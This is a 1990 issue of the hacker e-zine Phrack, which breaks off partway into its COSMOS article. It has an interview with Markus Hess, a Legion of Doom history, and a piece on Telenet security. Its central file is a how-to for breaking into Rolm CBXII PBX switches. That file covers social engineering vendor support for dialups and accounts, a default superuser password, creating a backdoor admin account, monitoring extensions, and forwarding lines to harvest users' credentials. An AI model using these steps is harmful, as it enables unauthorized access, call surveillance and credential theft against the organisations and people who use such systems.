==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #1 of 9
Issue XXXI Index
________________
P H R A C K 3 1
05/2890
________________
Welcome to a new begining of Phrack Inc. Yes, Phrack is not dead.
On the contrary, Phrack will and can't ever die. Phrack is more than just
a technical newsletter that comes out every now and then, it's a symbol of our
hacking history. Whether, it's called Phrack or some other name, it will
always be published for the same reasons:
1. Inform it's readers of current events and other related items
of hacker interest.
2. Educate it's readers on all topics of shared common interests
that may benefit the hacker at his hobby.
3. Remain an authority in the hacking world and an observer in the
ever growing technical community.
4. Be open to anyone who wishes to submit an article for publication
that will further the hacker's education.
Many things have happened since the last publication of Phrack. We at
Phrack inc. will try to "shed some light" on the matters that have occured. And
as for all these ridiculous rumors that have been spreading, let us speak the
truth and be heard.
Hah. No my friends, Phrack is not dead..
--DH (Editor)
Note: If you wish to contact Phrack inc. to submit a file, ask around for
a Phrack inc. distribution site -- Then Email "Phrack inc." and be very very
patient.
Note: Special thanks to T C, Phz, and others for wide
area distribution.
_______________________________________________________________________________
Phrack XXXI Table of Contents
=============================
31-1. Introduction to Phrack 31 by DH (2K)
31-2. Phrack Pro-Phile of Markus Hess by PHz (6K)
31-3. Hacking Rolm's CBXII by DH (15K)
31-4. TAMS & Telenet Security by Phreak_Accident (7K)
31-5. The history of The Legion Of Doom (10K)
31-6. Cosmos Overview by EBA (52k)
31-7. Tymnet Security Memo by Anonymous (9K)
31-8. PWN/Part01 by Phreak_Accident (13K)
31-9. PWN/Part02 by Phreak_Accident (17K)
31-10. PWN/Part03 by Phreak_Accident (40K)
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #2 of 10
-*[ P H R A C K # 3 1 P R O P H I L E ]*-
-*[ June 1, 1990 ]*-
-*[Phz]*-
---[ Markus Hess ]---
Recently the Phrack editors had the opportunity to talk to Markus Hess in
his tiny Hannover flat. This special edition of the Phrack Prophile details
our conversation, as well as general background information about the German
Hacker.
This Phrack Prophile is not in the same format as previous ones because of
the nature of the profile. In the next issue, we will reform back to the
orginal creator's format.
AGE: 26
HEIGHT: 5' 10"
HAIR COLOR: BROWN
EYES: BROWN
FROM: Hannover, West Germany
PAST EMPLOYMENT: Software developer in Hannover.
PEOPLE: Stephen Winero, Walu Holland (Other CCC members)
STRENGTHS: AT&T Unix, VAX, SunOs and BSD os's
Hess, most well known as the hacker who's exploits are detailed in
Clifford Stoll's _The_Cuckoo's_Egg_, "is as paranoid on the telephone as he
is on the computer." Although he was very reluctant to talk to us, we did
manage to talk to him about hacking and _The_Cuckoo's_Egg_.
Ringing Hanover..
RING
RING
RING
ANSWERED
HESS: Hallo?
PHRACK: Is this Markus Hess?
HESS: Yes.
PHRACK: Do you smoke Benson & Hedges?
(At this point we weren't sure it was actually him)
HESS: Yes, who is this?
PHRACK: We are calling from the USA, we want to ask you some questions.
We talk to hackers in the USA.
HESS: I won't have anything to do with hackers anymore. I have talked in
court earlier this year.
PHRACK: Did you know you were in a novel about a hacker in the US?
HESS: Novel? Yes, I know of a novel.
PHRACK: Have you read the book?
HESS: Yes I have read the book.
PHRACK: Is it all true? Is it all true? Do you think Cliff lied or tried
to exaggerate in the book?
HESS: Yes, I think so.
HESS: Yes, He lied.
PHRACK: Have you ever talked to Stoll?
HESS: I have talked to him, but not privately. I don't want to talk about
this.
PHRACK: Have you ever seen Cliff Stoll?
HESS: Yes I have seen him.
(We might think this from the back of the book)
PHRACK: He's goofy looking isn't he?
HESS: goofy? I don't understand.
PHRACK: Anyway, so you think he lied in the book?
HESS: Yes, he lied.
PHRACK: What did he lie about?
HESS: I don't want to talk about this.
PHRACK: Okay, are you in the Chaos Computer Club?
HESS: No, I won't have anything to do with hackers any more.
PHRACK: Were you ever involved with them?
HESS: No. I was not in it.
PHRACK: Do you know anyone in it [the CCC]?
HESS: Yes. I really must go now.
PHRACK: Who do you know in it [the CCC]?
HESS: Stephen Winero.
PHRACK: Is that it?
HESS: I know Walu.
PHRACK: Hmm. Are you being watched?
HESS: I think so. I can not talk about this.
PHRACK: Were you scared of going to jail?
HESS: jail?
PHRACK: Prison, were you scared of going to prison?
HESS: I don't know.
PHRACK: What happened in your words at court?
HESS: In your words? I don't understand.
PHRACK: What happened in court?
HESS: I don't understand.
PHRACK: Forget it.
PHRACK: Do you still have your computer?
HESS: No. I don't have any computer here.
PHRACK: Did you think they were going to catch you?
HESS: No. I knew nothing of it.
PHRACK: Has any other hackers tried to contact you in the U.S.?
HESS: No. You are the first to call.
PHRACK: So is it my understanding that Stoll lied in parts of the book?
HESS: Lied? Yes he lied.
PHRACK: Why do you think he would lie?
HESS: I don't know.
PHRACK: Do you think he made you look destructive?
HESS: Yes. He made me look mean.
PHRACK: Are you? Mean that is?
(Chuckle)
HESS: No. He made me look like I was a criminal.
PHRACK: Why did you do it Markus?
HESS: Do what?
PHRACK: Hack all over the network like that?
HESS: I cannot answer.
PHRACK: Do they call you a liar in court?
HESS: Yes. They call me a liar.
PHRACK: What are you going to do now?
HESS: I don't understand.
PHRACK: Are you finished with hacking?
HESS: Yes, I have nothing to do with hackers.
PHRACK: Was someone helping you hack?
HESS: I cannot answer.
PHRACK: How come you cannot answer that question?
HESS: I cannot.
PHRACK: Yes, well, Many in the U.S. [hackers] don't like the Novel.
PHRACK: What do you think of it?
HESS: It is not true.
HESS: I don't know.
PHRACK: Who taught you the EMACS hole?
HESS: I cannot say.
PHRACK: Then you must have been working with someone, correct?
HESS: No, I cannot answer.
PHRACK: Is the police comming down on you hard?
HESS: police? I don't und...
PHRACK: Yeah, yeah. The law? Are they being hard on you.
HESS: Yes.
<SILENCE>
HESS: I must go now.
PHRACK: Can we call you later?
HESS: Umm, I don't know. No.
PHRACK: Why not?
HESS: I cannot answer.
PHRACK: What about in a couple of months?
HESS: Yes, in a couple of months you can call.
PHRACK: Your not moving are you?
(Knowing that Germans rarely ever move and their phone
numbers never change this was a silly Q.)
HESS: No. I no move.
PHRACK: Okay, then we'll call you in a couple of months.
HESS: Okay. I must go.
PHRACK: Wait a second.
HESS: Yes?
PHRACK: Do you have anything to say to American Hackers?
HESS: No.
HESS: I have nothing to do with hackers.
PHRACK: Well, good luck.
HESS: Yes, you too.
<CLICK>
Unfortunately, our lack of German and Hess' weak English made
communication difficult. He is a very paranoid person who was obviously
uncomfortable talking to us.
Those of you that have read Stoll's book know that Hess was involved
with hacks on American Military Computers, and indirectly involved with
Computer Espionage and the KGB. Phrack strongly discourages trying to
hack Military computers and particularly takes offense to computer
espionage.
From the information we have gathered from him and by talking to him,
we feel that Markus Hess wasn't as smart as Clifford Stoll portrayed him to be.
We also feel that Markus was not working alone and that others were involved.
This however we cannot be 100% sure because of our communication faults.
_______________________________________________________________________________
--------------------------------------------------------------------------------
===Phrack Inc.===
Volume Three, Issue Thirty-one, Phile #3 of 10
////////////////////////\n / * * \n /
/ Hacking Rolm's CBXII/9000 \n by DH /
/ 05/24/90 \n * * /
////////////////////////
Introduction
------------
IBM Rolm's CBXII/9000 is a very powerful machine. Powerful in the aspect
that one has the switch(s) at his control. Controling switches means you can
control the entire PBX environment (And it's users).
This file will not get technical. Basically, I'm writing this file on
the HOW-TO's of the internal works of CBXII and the basics of obtaining the
dialups and account information need to access the machines. For further
information on CBX's in general, read Epsilon's Phrack Phile on them, or
consult Evil Jay's phile on OSL's.
Obtaining Dialups
--------- -------
Obtaining dialups unfortunately is the hardest part of hacking CBXII's.
(Yes, even harder than hacking them). There are several ways to obtain the
dialups. I would say a good bit of CBX's are at universities and hospitals
where they own their own switches. Most of the time you can determine if they
have one by calling the Telecommunications Department of the target location.
Or, another way is to check with ROLM. If you *KNOW* that a target location
has a CBXxx machine, you can call ROLM's 800 wats line and say your with the
Telecommunications Department and your looking for the DIALUP. Rolm has files
on all their CBXxx's and the Dialups also. They might ask you for a NODE #
for the dialup, and you should usually respond with what node you want (Since
different nodes handle different areas of the PBX). Basically, nodes start at
ONE and usually goto THREE or FOUR, depending on the size of the PBX.
CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which
is a highly used and common voice mail system). This of course doesn't mean
that every PHM (Phone-Mail) system has a CBXxx attached. But it is generally
a good start.
The following is a checklist to determine if the target location could
have a CBXxx for controlling their switch. By no means however, if your target
location has all of the following it could have a CBXxx.
1) Does the location handle it's own switch?
If so, what kind, and who services it.
2) Does IBM Rolm handle any aspect of their telecommunications
department?
If so, this is a possible CBXxx location.
3) Does the location have Rolm Phone-Mail?
These three guidelines are not requirements. I.E. -- The location
could have a non-IBM PBX but still have a CBXxx for handling the switch.
So who knows.. It's up to you and your bullshitting and scans.
Hacking the CBXxx's
------- --- -------
Well, once you have obtained the dial-ups, you are almost halfway
there. Hacking the CBX is the easy part. 1st off, IBM Rolm ships *ALL*
of their machines with a default account (Yes, and they never change it).
When the destination of the CBX recieves the machine, they use the default
to create other accounts for employees, PBX operators, and administration.
Rolm IBM also has a field support account embedded in the machine. These
are different to each location and correspond to the serial number of the
machine (Rolm's accounts can be obtained from Rolm's 800 technical support
line). So, now that we know that there is a default account that telecom
department uses to setup the other accounts after they recieve the machine,
tells us that this is a priviledge account. And it is.
USERNAME: SU
PASSWORD: SUPER
How nice for them to give us such power. Yes, it's a basic default
with SuperUser priviledge. If for some reason the account default has been
changed, their are other ways of getting in:
1) Call Rolm and get the Field account information.
2) Try first names of Telecom Dept. employees, and PBX Operators.
3) Use every Hacking skills you have (If any).
Some older versions of CBX don't even require logging in with an
account. Those versions are less responsive to the administrators needs,
but can be useful to one also. Don't be discouraged if the SU password is
changed, just call Rolm and get the field account.
The following is the matrix before one access the machine. *Note that
it clearly identifies* *Also: Accessible at 300 baud and e,7,1*
CONNECT ID banner
_Release version # /
/ /\nRolm CBXII RELEASE 9004.0.65 RB74UCLA11956
BIND DATE: 8/SEP/88 \nYOU HAVE ENTERED NODE 1, CPU 2 \_Name of owner, IE: UCLA
11:14:30 ON FRIDAY 2/11/1990 (System ID)
USERNAME: xxx
PASSWORD: xxx
INVALID USERNAME-PASSWORD PAIR.
Once your in
---- ---- --
Once your in, you should have no problems wondering around the
machine and using the utilities in the machine's operating system. There is
very specific help functions inside the machine that will guide you through
with no problems. At the CBX prompt:
%. HELP ?
or
%. ?
Should produce a valid listing of options and sub-functions. Every
function can be followed with a '?' to give lists of valid sub-functions under
that function or how the syntax of that function should be used.
The following is a listing of commands for CBXII/9000:
ABORT ACTIVATE ATTR BYE
CANCEL CARD CDRSM CDT
CHANGE CHG CLEAR CLR
CMPCT CMSTS CNCL CNFG
CONVERT COPY CPEG CTMON
CTRA CTRTL CXCLR COPY
CXCLR CXCON CXNET DACK
DADD DAEVT DANS DBDMP
DCAT DCF DCOM DDMA
DDQ DDT DE DEACTIVATE
DEFINE DELETE DEMOUNT DESUM
DEX DFACK DFCOM DFEAT
DFEVT DHTQ DHWS DIAG
DIQ DISABLE DIWQ DKQ
DML DMNT DMS DMTST
DOWN DPATR DPMR DPMS
DPPRI DPTR DQQ DRCT
DREGS DSBLE DSQ DSST
DSTAK DTCB DTDQ DWQ
DX_TR ENABLE ENB ENBLE
ETIO EX EXM EXN
EXP EXPAND FINIT FORMAT
FREER FSD GTOD HDBST
HELP INSTALL KPFA LCT
LIST LOAD LOGOFF LOGON
LPEG LPKT LSCT LSL
LST LTCB MNT MONITOR
MOUNT MTRACE NEXT NSTAT
PAGE PCNFG PDIO PFA
PKTS PLIST PLTT PPFA
PS PSH QAT QITM
QTEST RCT RECEIVE RENAME
REPLY RESTART RESTORE REVERSE
RM RMOFF RPFA RSC
RSCLK RSTOR RSTRT SAT
SCAN SEND SET SHOW
SITM SOCON SOUNC SSAT
START STATE STATUS STEST
STOD STOP STRT STS
TDCD TEST TKSTS TRTL
TST TX UNLK UNLOCK
UP VERIFY XDEF XMIT
XPND
These commands can be executed from and '% ' prompt. If the command is
followed by a '?', more information will be supplied about the command.
Using the ICI
----- --- ---
The Interactive Configuration Interface controls immediate changes in
the switch and PBX environment. The Utility is explained in great detail
through the actual running of it. You can access the ICI by typing:
% CNFG
CBXII/9000
INTERACTIVE CONFIGURATION INTERFACE
CPU 2
15:14:32 ON FRIDAY 5/02/1990
COMMAND:
This is the main command prompt. From here you can exercise the '?'
help list to get valid commands. There are four phases of the ICI utility:
Modify, Create, List, and Delete. These can be used on Extentions, Trunks,
Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect.
The following is a sample of using 'list' to list a current extention in the
PBX:
_Forward to EXTN 2000
COMMAND: LIST EXT 4038 / _Outside number
/ FORWARD ON / to forward to
FORWARDING BSY RNA DND /
EXTN TYPE COS TARGET1 TARGET2 I E I E I E RINGDOWN NAME
---- ---- --- ------- ------- - - - - - - -------- ----------
DS 4038 EXTN 56 2000 1 1 1 1 1 1 95551212 R.STABELL
/ / \n Extention / -Class of service if R Auto. Forward Owner of
--Type of line BUSY I No Matter What EXTN.
(Reg. Extention) N
G
Note: The 1's specifies to forward to target#1 & NO ANSWER
(As 2's would mean forward to #2 target)
This should detail how to modify a listing like above using the 'MODIFY'
command in the ICI. Once modified, all transactions are processed immediately.
Using the 'Delete' command one can delete extentions, trunks, ect.
So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE.
Each can be used with the following "Nouns" to modify that "Noun":
BUTTON_120 BUTTON_240 CDR_EXCLUDE CNFG_ERRORS
CNFG_QUEUE CNFG_STATUS CNFG_USERS COM_GROUP
COS_FEAT DATA_ACCESS DATA_DEVICE DATA_GROUP
DATA_LINE DATA_SUBMUX DLI ETS
EXTEN FAC FAC_TYPE FAMILY
FEAT_CODE FIRST_DIGIT HD_GROUP LEX
LOGON_PROFILE MAP MEM_PARTS PARAM
PICK POWER Q_TYPE ROUTE_LIST
RP RPD RPI RPS_120S_ON
RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION
SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI
SPEED T1D3 T1D3_GRP TRUNK
TRUNK_GROUP VPC
The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on
the system. One can use MODFIY or CREATE to set them up an account with SU
access. The FAMILY noun is the listing of the groups with different access,
to different "nouns" available. I.E.: Not everyone can access the CHANGE
LOGON_PROFILE to create an account.
To create an account with SU access, type (while in ICI):
% CREATE LOGON_PROFILE
ENTER NAME (1-12 CHAR): TEST
ENTER PASSWORD: TEST
RETYPE: TEST
Next it will ask you for a family. For SU access, type "SYSTEM_ADMIN".
After family, the machine should prompt you for a "verb". Verbs are the actual
functions or commands, so in this environment you can set the commands a user
can access. So, for SU, enter "ALL" for every command access.
To get a valid listing of users online, try this:
% LIST CNFG_USERS
NUMBER OF USERS MAX NUMBER OF USERS
3 5
PORT USER_NAME START_TIME HOW_LONG
17 SU 17:47:57 0:28:34
2 FIELD 18:16:03 0:0:28
3 MARYB 18:16:03 0:10:03
Using the Monitoring Utility
----- --- ---------- -------
This command is one of the more powerful commands in the CBXxx system.
The monitor command should be invoked from within the main function command
level and not in the ICI level. The monitoring command allows you to actually
watch or monitor TRUNKS and EXTENTIONS. So, if I were to type:
% MONITOR EXT 4038
10:02:43 ON FRIDAY MAY/02/1990
EXT# STATE DI CODE DIGITS PROCESS STATUS
---- --------------- -- ---- ------------- ------------ ------
4038 IDLE STN FWD NUM FWD
/ / / \nExtention Not in use Standard / Forwarded
Extention /
Forwarded to
a number
This shows the extention to be IDLE and not in use. But, with forwarded
call processes to a standard number. You would have to use ICI to look up the
number it's forwarded to if you wanted.
% MONITOR EXT 4038
10:03:44 ON FRIDAY MAY/11/1990
EXT# STATE DI CODE DIGITS PROCESS STATUS
---- -------------- -- ---- ------------- ----------- ------
4038 DIAL TONE STN FWD NUM FWD
4038 DIALING Y 9 / \n4038 DIALING Y 92 S F N Extention
4038 DIALING Y 923 t o u Forwarded
4038 DIALING Y 9233 a N r m
4038 DIALING Y 92334 n u w b
4038 DIALING Y 923345 d m a e
4038 DIALING Y 9233456 a b r r
4038 DIALING Y 92334564 r e d
4038 CONN T025N N d r e
/ / d
\_Dialing NO \_Number dialed
\_Extention \n Connected to
Outside trunk T025N
This monitoring shows the extention actually dialing the number, and then
connecting to an outside truck. Unfortunatley, one we cannot monitor without
access to a bell switch.
Monitoring can also be done with trunks. I will not display any trunk
monitoring since it is quite simple to decypher.
Manipulating the switch
------------ --- ------
There are many ways you can manipulate the CBX's to gain accounting
information on data lines within the PBX environment. One sure-fire method
would be to forward an actual data dial-up extention to a bridge or loop and
then write an emulation to intercept the user's account information real-time
as they connect to your fake dial-up.
Or perhaps if an university uses the CBX, one could maybe forward the
computer help desk extention to a bridge or loop and as an unsuspecting user
calls up, ask him what machine and account info he has access to for a help
log sheet you are taking.
Who cares. Who knows. There are thousands of things you can do to use
the CBX to your advantage. Hell, you have the whole switch at your command.
DH - 05/11/90
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #4 of 10
/ Everything you always wanted to know.. \n / about Telenet Security, But were to stupid to find out. \n By Phreak_Accident
Ever since the early 80's GTE Telenet has been expanding their public
packet switching system to hold enormous amounts of users. Currently GTE
SprintNet (Yes, Telenet is out, SprintNet is in.) has over 300 nodes in the
United States and over 70 other nodes abroad. SprintNet provides private
X.25 networks for larger companies that may have the need. These private
networks are all based on SprintNet's 3270 Dedicated Access Facility which
is currently operating for public use, Hence for the major security Sprint-
Net has aquired.
SprintNet's security department is a common idea of what any large
public packet network should be. With their home office located in Virgina
(703), most Hacker's who run into trouble with them would wind up talking
to Steve Mathews (Not the head of security but a prime force against the
major attacks Sprintnet recieves from Hackers anually.), who is a very
intelligable security analysist that deals with this type of problem daily.
Because of Steve's awarness on Hackers invading "His" system (As most
security personnel refer to the system's they work for as their own.), He
often does log into Bulletin Boards accross the country looking for Sprint-
Net related contraband. At the time of this article, Steve is running an
investigation on "Dr. Dissector's" NUAA program. (NUA attacker is a Sprint-
Net NUA scanner.) Besides this investigation, he currently stays in contact
with many Hackers in the United States and Abroad. It seems Steve recieves
many calls a month from selected Hackers that have interests in the Security
of SprintNet. Wow. Who the Hell would want to call this guy. From many
observations of Steve Mathews, I find him to in deed be the type to feel a
bit scared of Hackers. Of course, his fright is really quite common amoung
security personnel since most fear for their systems as well as themselves.
(Past experiences have showed them not to take Hackers lightly, Hence they
have more contacts then 60 rolodex's put together.)
For now, let's forget Steve Mathews. He's not important an important
influence in this article. Trying to pin a one-person in a security depart-
ment that handles security is like finding a someone on a pirate board that
doesn't use the word "C0DE" in their daily vocabulary.
Telenet's main form of security lies in their security software called
TAMS (Telenet Access Manager System). The TAMS computers are located in Res-
tin, Virginia but are accessable throughout the network. Mostly, the main
functions of TAMS are to:
* Check to see if the NUI/Password entered is a valid one.
* Check to see if the Host has list of NUI's that can access
that host. If another NUI is used, a Rejection occurs.
* Processes SprintNet's CDR (Call Detail Recording), which
includes Source and Destination, Time of call, Volumes
of data recieved, and the Total time of the call.
* Can be used by host to add an optional "ALPHA" NUA for "easy"
access.
* Can secure Hosts further by adding an NUA security password.
* Restricts calls without an NUI for billing (I.E. No collect
calls to be processed).
* Accepts all calls to host as a prepaid call (I.E. Accepts all
calls).
TAMS is really for the handling of NUI and corresponding NUA's, therefore
being a security concept. TAMS holds all the data of NUI's and restricting NUAS
for the ENTIRE network. If one could gain the access to TAMS, one could have
the entire network at his/her disposal. This of course if highly impossible
to SprintNet's security department, but not for a couple of hackers I have ran
into. Yes, TAMS is quite interesting.
In other aspects of SprintNet security, lets focus on the actual X.25
software that they use. Anybody who tells you that Telenet can monitor the
sessions currently taking place on THEIR network is WRONG (And probably very
stupid as well). Monitoring is a basic feature of all X.25 networks, whether
it's a little PeeShooter network or not, they can and do monitor sessions.
Of course their are far to many calls being placed on SprintNet to be
monitored, but a scared host can always request a full CDR to be put on their
address to record all sessions comming in on that NUA. Such as the many re-
corded sessions of the ALTOS chat(s) in Germany that was a hot-spot for many
Hackers across the United States and Abroad. After the detection of ALTOS,
through the hundereds of illegally used NUIs, CDR's and direct host monitoring
were used on the ALTOS hosts. As far as prosecutions concern, I doubt their
were any.
Now, as far as other security software on SprintNet, they have a call
tracking service that is called AUTOTRAIL. Basically, AUTOTRAIL traces the
connections through the DNIC's and back to the orginating NUI and/or NODE loca-
tion that placed the call.
AUTOTRAIL has nothing to do with ANI. Not at all. In fact, the many
dialups that lead into SprintNet's PDM gateway do NOT have any type of ANI.
That is basically a telephony problem. ALthough I would think twice about
messing with a dialup that is run on a GTE carrier. That's up to you though.
Another aspect of security in which Telenet offers is an ASCII tape
that can be obtained by a host customer, which contains all CDR information of
any connection to that host for the last week/month/year. So, it is obvious
to say that SprintNet does have a hudge database of all CDRs. Yes, another
point: This database is located in the TAMS computer. Hmm, ahh.. Wouldn't
that be neat.
:PA
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #5 of 10
The History of The Legion Of Doom
--- ------- -- --- ------ -- ----
During the summer of 1984 an idea was formulated that would ultimately
change the face of the computer underground forever. This particular
summer, a huge surge of interest in computer telecommunications placed
an incredibly large number of new enthusiasts on the national computer scene.
This crowd of people all seeking to learn as much as possible
began to put a strain on the nation's bulletin board scene, as the novices
stormed the phonelines in search of knowledge. From out of this chaos
came a need for learned instructors to help pass on their store of
information to the new throngs.
One of the most popular bulletin boards of the day was a system in New York
state called Plovernet, which was run by a person who called himself
Quasi-Moto. This BBS was so heavily trafficked, that a major long
distance company began blocking all calls to its number (516-935-2481).
The co-sysop of Plovernet was a person known as Lex Luthor. At the time
there were a few hacking groups in existence, such as Fargo-4A and Knights of
Shadow. Lex was admitted into KOS in early 1984, but after making a few
suggestions about new members, and having them rejected, Lex decided to
put up an invitation only BBS and to start forming a new group.
Starting around May of 1984, Lex began to contact those people who he had
seen on BBSes such as Plovernet and the people that he knew personally
who possessed the kind of superior knowledge that the group he envisioned
should have. Many phone calls and Alliance Teleconferences later, the
group of individuals who made up the original Legion of Doom were compiled.
They were:
Lex Luthor
Karl Marx
Mark Tabas
Agrajag the Prolonged
King Blotto
Blue Archer
EBA
The Dragyn
Unknown Soldier
The group originally consisted of two parts: Legion of Doom, and Legion
of Hackers. The latter was a sub-group of the first, comprised
of people who were more advanced in computer related subjects. Later on,
as members began to all become more computer-based, the Legion of Hackers
was absolved. (The name "Legion of Doom" came from the cartoon series
"Superfriends," in which Lex Luthor, Superman's arch rival, led a group
by the same name)
The actual Legion of Doom bulletin board was quite ahead of its time.
It was one of the first "Invitation-only" hacking based BBSes; it was the
first BBS with security that caused the system to remain idle until
a primary password was entered; and it was the first hacking BBS to deal
with many subjects in close detail, such as trashing and social
engineering. The BBS underwent three number changes and three different
login procedures during its life. At its height, the BBS had over
150 users and averaged about 15 posts per day. This may seem
high when compared to contemporary BBSes, but this was a private system,
with only very-competent users, so the quality of messages content was always
high.
There was always some confusion that falsely assumed since someone
was on the LOD BBS, that they were a member of the group. In fact,
only a handful of the total LOD membership were ever on the actual
LOD BBS.
The Legion of Doom also had special subboards created for its members on
other BBSes after the home base BBS went offline. The first was on
Blottoland, the next on Catch-22, followed by one on the Phoenix Project,
and the last on Black Ice Private. The group's members have usually tried to
keep a low profile publicly, and usually limited their trade of information
to select private BBSes and personal telephone conversations. This adherence
to privacy has always added to the LOD mistique. Since most people didn't
know exactly what the group was involved in, or experimenting with, people
always assumed that it was something far too detailed or sensitive to be
discussed. For the most part, this was not true, but it did not help to
diminish the paranoia of security personnel that LOD was after their
company's systems.
The group has undergone three distinct phases, each a result of membership
changes. The first phase ended with the busts of Marx, Tabas, Steve Dahl,
Randy Smith, X-man, and the abandonment by Agrajag and King Blotto.
The group lay semi-dormant for several months, until a resurgence
in the summer of 1986, in which several new members were admitted, and a new
surge of would-be hackers appeared, ready to be tutored. This phase again
ended in a series of busts and paranoia. The third phase basically revolved
around Summercon of 1988, where several new members were admitted by those
LOD members attending the festivites. The third phase is now at an end
brought on by busts and related paranoia, again, two years after its onset.
There is no indication that points to any resurgence in the future, but
nothing is certain until summer.
Since its creation, LOD has tried to put out informative files on a wide
variety of topics of interest to its contemporaries. These files ranged from
the first actual scanned directory of Telenet, to files on various operating
systems. The LOD Technical Journal was to be a semi-regular electronic
magazine comprised of such files, and other items of interest to the hacking
community. Only three issues of the Technical Journal were produced. As
the fourth issue was being pieced together, several members were raided, and
work on it was abandoned.
>From the time it was formed continuing up to the present, the Legion of
Doom has been quite a topic of controversy in the computer underground and
with computer security professionals. The Legion of Doom has been
called everything from "Organized Crime" to "a Communist threat to national
security" to "an international conspiracy of computer terrorists bent
on destroying the nation's 911 service." Nothing comes closer to the
actual truth than "bored adolescents with too much spare time."
LOD members may have entered into systems numbering in the tens of
thousands, they may have peeped into credit histories, they may
have monitored telephone calls, they may have snooped into files and
buffered interesting text, they may still have total control over
entire computer networks; but, what damage have they done? None, with
the exception of unpaid use of CPU time and network access charges. What
personal gains have any members made? None, with the exception of three
instances of credit fraud that were instigated by three separate greedy
individuals, without group knowledge.
The Legion of Doom will long be remembered in the computer underground as
an innovative and pioneering force, that consistently raised the collective
level of knowledge, and provided many answers to questions ranging from the
workings of the telephone system to the structure of computer operating
systems. No other group dedicated to the persuit of computer and
telecommunications knowledge has survived longer, and none probably will.
The Legion of Doom 1984--1990
------------------------------------------------------------------------------
Alumni of the Fraternal Order of the Legion of Doom (Lambda Omega Delta)
Handle Entered Exited Location Reasons for leaving
------------------------------------------------------------------------------
Lex Luthor Early 84-- Florida
Karl Marx Early 84--Late 85 Colorado Bust w/Tabas..College
Mark Tabas Early 84--Late 85 Colorado Too numerous to list
Agrajag the Prolonged Early-84--Late 85 California Loss of Interest
King Blotto Early 84--Late 85 Ohio College
Blue Archer Early 84--Late 87 Texas College
EBA Early 84-- Texas
The Dragyn Early 84--Late 86 Minnesota Loss of Interest
Unknown Soldier Early 84--Early 85 Florida Bust-Toll Fraud
Sharp Razor Late 84--Early 86 New Jersey Bust-Compuserve Abuse
Sir Francis Drake Late 84--Early 86 California Loss of Interest
Paul Muad'dib Late 84--Early 86 New York Modem Broke
Phucked Agent 04 Late 84--Late 87 California College
X-Man Late 84--Mid 85 New York Bust-Blue Boxing
Randy Smith Late 84--Mid 85 Missouri Bust-Credit Fraud
Steve Dahl Early 85--Early 86 Illinois Bust-Credit Fraud
The Warlock Early 85--Early 86 Florida Loss of Interest
Terminal Man Early 85--Late 85 Massachusetts Expelled from Group
Dr. Who Early 85--Late 89 Massachusetts Several Reasons
The Videosmith Early 86--Late 87 Pennsylvania Paranoia
Kerrang Kahn Early 86--Mid 89 London, UK Loss of Interest
Gary Seven Early 86--Mid 88 Florida Loss of Interest
The Marauder Early 86--Mid 89 Connecticut Loss of Interest
Silver Spy Late 86--Late 87 Massachusettts College
Bill from RNOC Early 87--Late 87 New York Bust-Hacking
The Leftist Mid 87--Late 89 Georgia Bust-Hacking
Phantom Phreaker Mid 87-- Illinois
Doom Prophet Mid 87-- Illinois
Jester Sluggo Mid 87-- North Dakota
Carrier Culprit Mid 87--Mid 88 Pennsylvania Loss of Interest
Master of Impact Mid 87--Mid 88 California Loss of Interest
Thomas Covenant Early 88--Early 90 New York Bust-Hacking
The Mentor Mid 88--Early 90 Texas Retired
Necron 99 Mid 88--Late 89 Georgia Bust-Hacking
Control C Mid 88--Early 90 Michigan
Prime Suspect Mid 88-- New York
The Prophet Mid 88--Late 89 Georgia Bust-Hacking
Phiber Optik Early 89--Early 90 New York Bust-Hacking
** AKA **
Randy Smith Poof!
Dr. Who Skinny Puppy
Kerrang Kahn Red Eye
Phantom Phreaker ANI Failure / Psychedelic Ranger
Doom Prophet Trouble Verify
Thomas Covenant Sigmund Fraud / Pumpkin Pete
Necron 99 The Urvile
Control C Phase Jitter
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #6 of 10
L OO DD
L O O D D
LLL OO DD
PRESENTS
************************************************************
************************************************************
*** ***
*** TTT H H EEE ***
*** T H H E ***
*** T HHH EEE ***
*** T H H E ***
*** T H H EEE ***
*** ***
*** ***
*** DD EEE FFF III N N III TTT III V V EEE ***
*** D D E F I NN N I T I V V E ***
*** D D EEE FFF I N NN I T I V V EEE ***
*** D D E F I N NN I T I V V E ***
*** DD EEE F III N N III T III V EEE ***
*** ***
*** ***
*** CCCC OOO SS M M OOO SS ***
*** C O O S S MM MM O O S S ***
*** C O O S M M M O O S ***
*** C O O S S M M M O O S S ***
*** CCCC OOO SS M M OOO SS ***
*** ***
*** ***
************************************************************
************************************************************
BY
ERIK BLOODAXE
PRELUDE
In the past, many files have been written about COSMOS. I
have always been rather disappointed in their quality and in
their presentation, so I have taken on the responsibility of
doing one myself. This should sum up COSMOS for everyone who
reads it. It contains formats for very useful commands, an
entire transaction list, COSMOS "tricks", and a list of all COSMOS
abbreviations and their formats.
=============================================================================
INTRODUCTION
Bell Labs COmputer System for Mainframe OperationS (COSMOS)
is basically just a database for maintaining records of
equipment and other line information and generating reports
on that information. The system is usually set up on a DEC
PDP 11/45 or 11/70.
The main responsibilities of the COSMOS system are:
Maintaining records
Issuing reports
Processing service and work orders
Assigning telephone numbers
Load balancing for switching computers
Output of ESS recent change information
LOGGING ON
When connecting to COSMOS the system will respond with:
;Login: or LOGIN:
at which point you enter a username. The system will then
prompt:
PASSWORD:
at which point you enter the password for that username.
Finally, the system will prompt:
WC?
which asks you to enter the wire center for the exchange you
will be using in your work. After successfully completing
the login sequence you will be given the system prompt which
will be the two letter id of the wire center you entered and a
percent sign: "WC% "
To log off at this or at any point you can type control-y.
One of the major flaws in COSMOS security is that unless a
control-y is received the terminal is not logged out, even if
the user disconnects. Many times when you connect to COSMOS,
you will be dropped right into the "WC% " prompt. This even
